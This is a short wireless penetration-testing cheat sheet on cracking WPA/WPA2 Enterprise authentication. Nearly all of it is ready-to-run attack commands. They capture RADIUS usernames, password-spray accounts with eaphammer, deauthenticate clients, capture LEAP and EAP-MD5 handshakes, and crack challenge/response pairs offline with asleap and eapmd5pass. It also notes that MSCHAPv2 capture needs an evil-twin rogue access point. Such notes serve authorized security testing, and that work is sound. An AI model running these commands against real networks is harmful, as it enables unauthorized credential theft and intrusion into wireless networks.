08. WPA WPA2 Enterprise (MGT) Authentication Cracking

RADIUS Usernames Capture

• With Wireshark: look for Identity field in EAP messages of type "Response, Identity"
• With crEAP:

python crEAP.py -i mon0 -c <channel>

RADIUS Accounts bruteforce / Password Spraying

./eaphammer --eap-spray \
	--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
	--essid <target_ESSID> \
	--password <password_to_spray> \
	--user-list <usernames_list>

--interface-pool flag is used to provide eaphammer with a list of wireless interfaces with which to create multithreading. https://github.com/s0lst1c3/eaphammer/wiki/XIII.-Password-Spraying

LEAP & EAP-MD5 Handshake Capture & Cracking

EAP-MD5 & MD5 do not use secure tunnel to perform client authentication. Therefore, it is possible to sniff authentication challenge/response and perform offline cracking.

1. Capture traffic & write captured handshakes to file:

airdump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0

2. (optional) Deauthenticate client from AP:

aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0

3. Crack

eapmd5pass r <capture> -w <wordlist>	# For EAP-MD5
asleap -r <capture> -W <wordlist>		# For LEAP (crack MSCHAPv2 challenge/response)
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist>  # Challenge/response colon-delimited format

MSCHAPv2 Challenge/Response Cracking (e.g. EAP-PEAPv0, EAP-TTLS, EAP-FAST)

• MSCHAPv2 can be used as "Inner EAP/Authentication Protocol" (inside TLS tunnel) in several EAP methods, such as: EAP-PEAPv0, EAP-TTLS, EAP-FAST.
• Capture of MSCHAPv2 Challenge/Response requires Rogue AP (Evil Twin Attack) + no validation of server's certificate on client (cf. eaphammer).

asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist>  # Challenge/response colon-delimited format